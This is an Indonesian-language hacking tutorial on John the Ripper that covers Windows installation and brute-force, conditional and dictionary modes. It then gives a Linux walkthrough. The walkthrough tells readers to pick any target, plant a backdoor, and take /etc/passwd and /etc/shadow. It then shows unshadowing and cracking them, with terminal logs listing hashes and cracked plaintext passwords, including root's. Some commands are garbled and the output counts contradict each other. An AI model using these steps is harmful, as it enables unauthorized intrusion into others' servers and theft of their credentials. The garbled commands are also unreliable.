John the Ripper adalah suatu program yang lumayan terkenal di dunia hacking. JTR biasa digunakan untuk meng-Crack suatu password.
INSTALASI JOHN THE RIPPER
– Download John the Ripper 1.7.0.1 (Windows – binaries, ZIP, 1360 KB) klik DISINI
Beberapa tips yg akan mempermudah saat menginstal John the Ripper pada windows
1. Simpan di C:/ , jangan di program files maupun folder apapun.
2. Ketika menginstal mungkin akan terlihat seperti C: / John/john1701 / dll Pindahkan semuanya keluar dari folder john1701 dan masuk ke folder pertama. Kemudian hapus john1701.
3. Sekarang ketika Anda masuk ke drive C anda dan membuka folder john, Anda akan melihat kedua folder doc untuk menjalankan, bukan john1701
4. Dalam run folder Anda akan melihat aplikasi “john-386″ atau “john-sesuatu”. Hanya ganti nama ke “john”
Untuk menjalankan JTP, kita membukanya melalui garis perintah ms-dos
Go Start, run, dan ketik cmd
ketikkan perintah ini: cd C: / john / run
BEBRAPA JENIS ATTACK MELALUI JTP.
-Bruteforce Attack-
Pertama saya akan menunjukkan modus JTP bruteforcing. mode ini adalah mencoba setiap kombinasi yang memungkinkan dari huruf (baik besar dan huruf kecil), angka, simbol atau kombinasi dari tiga sampai menemukan password. Sebelum saya memberitahu Anda bagaimana untuk melakukannya, kita harus mengambil hash (Saya akan menggunakan bentuk: CRjRYEn9g3PUc dari atas), menyalin dan masa di notepad, dan simpan di direktori “run” dalam John the Ripper sebagai file txt. Saya menyebutnya hash.txt. Salah satu cara untuk melakukan serangan jenis ini adalah untuk ketik “hash.txt john” (semua perintah tanpa tanda kutip) dan tekan enter. Ini akan mulai mencoba bruteforce password. Cara lain adalah dengan drag file hash.txt dan drop pada aplikasi john (ini akan dilakukan di folder run). Kekurangan dari bruteforce attack adalah memerlukan waktu yang sangat lama, tapi proses bisa dihentikan dengan mengetik perintah “ctrl + C”.
-Bruteforce Attack with conditions-
Cara ini lebih singkat. Jadi jika Anda berpikir password hanya berisi huruf Anda dapat menggunakan perintah “john-i: alpha hash.txt”, jika Anda berpikir password hanya berisi angka yang Anda dapat menggunakan perintah “john-i: hash.txt digit”, Anda juga dapat menggunakan perintah “john-i: semua hash.txt” untuk menebak password yang menggunakan kedua huruf dan angka.
-Dictionary Attack-
Cara ini dilakukan saat kita berhadapan dengan password cengan kombinasi yang panjang. tetapi metode ini lebih cepat dibandingkan apabila kita menggunakan bruteforce attack, tetapi membutuhkan ketelitian, karena kita perlu membuat daftar kata (sesuai kamus) dan jtp akan mencocokan setiap huruf yang sesuai dengan daftar yang telah kita buat.
Untuk contoh ini daftar kata saya sebut “wordlist.txt”.
Untuk melakukan Dictionary Attac, ketik perintah ini: john-w: hash.txt wordlist.txt
Ketika cracking password telah dilakukan,kita dapat memeriksanya dengan menggunakan perintah engan menggunakan perintah “hash.txt john-show”.
cara penggunaan :
Pertama-tama carilah sebuah target yang kalian suka lalu terserah cara kalian untuk memasang backdoor.
Carilah file “passwd” dan “shadow”,biasanya letak passwd dan shadow ada di /etc/passwd dan /etc/shadow lalu terserah kalian mau diupload atau dikerjakan dalam shell file “passwd” dan “shadow” untuk dicrack.
sekarang go to the point :
[root@D-and~ tmp]# wget
http://www.openwall.com/john/f/john-1.7.2.tar.gz
[root@D-and~ tmp]# ls
. radsess.13217 radsess.15352 radsess.26504
.. radsess.13221 radsess.15377 radsess.26508
.bash_history radsess.13252 radsess.15505 radsess.26516
.bash_logout radsess.13257 radsess.15509 radsess.26520
.bash_profile radsess.13261 radsess.15510 radsess.29908
.bashrc radsess.13262 radsess.15517 radsess.29909
.emacs radsess.13269 radsess.15521 radsess.29935
.gtkrc radsess.13273 radsess.15525 radsess.29940
.kde radsess.13277 radsess.15627 radsess.29946
.screenrc radsess.13278 radsess.15631 radsess.30573
.webmin radsess.13287 radsess.15632 radsess.30577
john-1.72.tar.gz radsess.13291 radsess.15661 radsess.30578
makewhatiswP9Kbd radsess.13292 radsess.15665 radsess.30585
[root@D-and~ tmp]# tar -zxvf john-1.72.tar.gz
john-1.72/src/AFS_fmt.c
john-1.72/src/BF_fmt.c
john-1.72/src/BF_std.c
john-1.72/src/BSDI_fmt.c
john-1.72/src/DES_bs.c
…
…
…
john-1.72/doc/OPTIONS
john-1.72/doc/README
john-1.72/doc/RULES
john-1.72/README
udah selesai dicompile kita cek, folder paman john kita yang tercinta
[root@D-and~ tmp]# ls
[root@D-and~ tmp]# ls
. radsess.13213 radsess.15348 radsess.26500
.. radsess.13217 radsess.15352 radsess.26504
.bash_history radsess.13221 radsess.15377 radsess.26508
.bash_logout radsess.13252 radsess.15505 radsess.26516
.bash_profile radsess.13257 radsess.15509 radsess.26520
.bashrc radsess.13261 radsess.15510 radsess.29908
.emacs radsess.13262 radsess.15517 radsess.29909
.gtkrc radsess.13269 radsess.15521 radsess.29935
.kde radsess.13273 radsess.15525 radsess.29940
.screenrc radsess.13277 radsess.15627 radsess.29946
.webmin radsess.13278 radsess.15631 radsess.30573
john-1.72 radsess.13287 radsess.15632 radsess.30577
john-1.72.tar.gz radsess.13291 radsess.15661 radsess.30578
makewhatiswP9Kbd radsess.13292 radsess.15665 radsess.30585
[root@D-and~ tmp]# cd john-1.72
[root@D-and~ john-1.72]
setelah kita masuk…kita langsung cari folder src
[root@D-and~ john-1.72]# ls
. .. README doc run src
[root@D-and~ john-1.72]# cd src
[root@D-and~ src]# ls
. alpha.h formats.h mips32.h single.c
.. batch.c getopt.c mips64.h single.h
AFS_fmt.c batch.h getopt.h misc.c sparc.S
………
………
Makefile detect.c math.c rules.c x86-mmx.h
Makefile.dep external.c math.h rules.h x86.S
alpha-4k.h external.h memory.c signals.c
alpha.S formats.c memory.h signals.h
kita compile dulu, dan liat jenis mesin yang ada
[root@D-and~ src]# make
To build John the Ripper, type:
make SYSTEM
where SYSTEM can be one of the following:
linux-x86-any-elf Linux, x86, ELF binaries
linux-x86-mmx-elf Linux, x86 with MMX, ELF binaries
….
….
win32-cygwin-x86-mmx Win32, Cygwin, x86 with MMX
win32-cygwin-x86-k6 Win32, Cygwin, AMD K6
generic Any other UNIX system with gcc
[root@D-and~ src]# make generic
[root@D-and~ src]# rm -f arch.h
[root@D-and~ src]# gcc -c -Wall -O2 -fomit-frame-pointer detect.c
[root@D-and~ src]# gcc -s detect.o -o detect
[root@D-and~ src]# ./best.sh “make” “DES_fmt.o DES_std.o” “MD5_std.o” “BF_std.o”
Compiling: DES benchmark (code version #1)
make[1]: Entering directory `/tmp/john-1.72/src’
[root@D-and~ src]# gcc -c -Wall -O2 -fomit-frame-pointer -funroll-loops DES_bs.c
[root@D-and~ src]# sed “s/unsigned long/ARCH_WORD/” nonstd.c > DES_bs_s.c
…
…
sampai muncul kata /run/unshadow
sampai muncul kata /run/unique
sampai muncul kata /run/unafs
…
pokonya gitu lah..pasti tau dong kalo selesai compile kaya apa
Selain itu kalian juga bisa dapatkan John The Ripper yang sudah di compile, tapi penulis tidak menyediakan JTR yang sudah di compile [carilah sendiri yang sudah di compile ]
Sehabis itu kita menuju ke folder run di direktory paman john.
[root@D-and~ src]# cd ..
[root@D-and~ john-1.72]# cd run
[root@D-and~ run]# ls
. digits.chr lanman.chr unshadow
.. john mailer unafs
alpha.chr john.pot passwd.1st unique
kaya gitu lah kira2 munculnya )
setelah itu kita cari letak passwd dan shadow
[root@D-and~ run]# whereis passwd
passwd: /usr/bin/passwd /etc/passwd /etc/passwd.OLD
/usr/share/man/man1/passwd.1.gz
/usr/share/man/man5/passwd.5.gz
Hmm.. ada tuh /etc/passwd,
kemudian gunakan cara yang sama untuk mencari file shadow ~ penulis telah mencoba beberapa shell dan memang letak passwd dan shadow di /etc/passwd dan /etc/shadow. File passwd emang bisa diread oleh siapa saja, sedang file shadow tidak bisa..diperlukan access root untuk mengambil 2 data tersebut, sebab file passwd dan shadow telah diencrypt.
Nah sekang kita masuk ke tahap untuk mendecrypt password, alias “CRACK PASSWORD”
[root@D-and~ run]# ./unshadow /etc/passwd /etc/shadow > passwd.1
maksudnya file passwd dan shadow di decrypt menjadi 1 file bernama passwd.1
[root@D-and~ run]# cat passwd.1
root:$1$??A5?wMG$MtD3gClDSs2//g6b.Ri/a/:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:/sbin/nologin
daemon:*:2:2:daemon:/sbin:/sbin/nologin
adm:*:3:4:adm:/var/adm:/sbin/nologin
lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
….
johnl:$1$fWkgxJYA$7DP..k060XiXpfLlQThFd/:504:500::/home/johnl:/bin/bash
chrisl:$1$AaSlFOUP$yoCJ2ZvqvDjwxLl0SkTAQ.:505:500::/home/chrisl:/bin/bash
turner:$1$p.lFHE.e$12uUTK3WMSRa.4Hgm15Ti/:506:506::/home/turner:/bin/bash
williams:$1$0egmDfIs$Bqes1nBH9vYBf6yXAUKFQ0:507:500::/home/williams:/bin/bash
Setelah itu kita jalankan berbagai macam perintah Paman John contohnya :
Keterangan meng-Crack Password yang sudah di decrypt :
1. menggunakan -i:alpha
[root@D-and~ run]# ./john -i:alpha passwd.1 &
maksudnya kita crack passwd.1 dan disimpan dibackground, jadi tinggalin aja selama paman john mengcrack password untuk kita, kita bisa ngeroot ntar dia muncul kaya gini kalo berhasil
[root@D-and~ run]# ./john -i:alpha passwd.1 &
Loaded 2 passwords with 2 different salts (Standard DES [24/32 128K])
watson (root)
johnl (summer)
2. menggunakan -single <== kita menggunakan paman john secara powerfull emang agak lambat tapi dia secara teliti mengecek passwordnya )
[root@D-and~ run]# /john -single passwd.2
3. kita ingin mengecrack password root / user saja
[root@D-and~ run]# ./john -i:alpha -user:0 passwd.1
atau
[root@D-and~ run]# ./john -i:alpha -user:500 passwd.1
untuk mengecek hasil password yang kita crack, dapat menggunakan
[root@D-and~ run]# ./john -show passwd.1
[root@D-and~ run]# ./john -show passwd.3
root:watson:0:0:root:/root:/bin/bash
coda:tools:500:500:CODA Manager:/home/coda:/bin/bash
adam:myrtle:501:500::/home/adam:/bin/bash
herschel:chester:502:500::/home/herschel:/bin/bash
johnl:summer:504:500::/home/johnl:/bin/bash
chrisl:turtle:505:500::/home/chrisl:/bin/bash
turner:account:506:506::/home/turner:/bin/bash
williams:ronald:507:500::/home/williams:/bin/bash
8 passwords cracked, 1 left
artinya user root memiliki password watson
user coda memiliki password tools
user adam memiliki password myrtle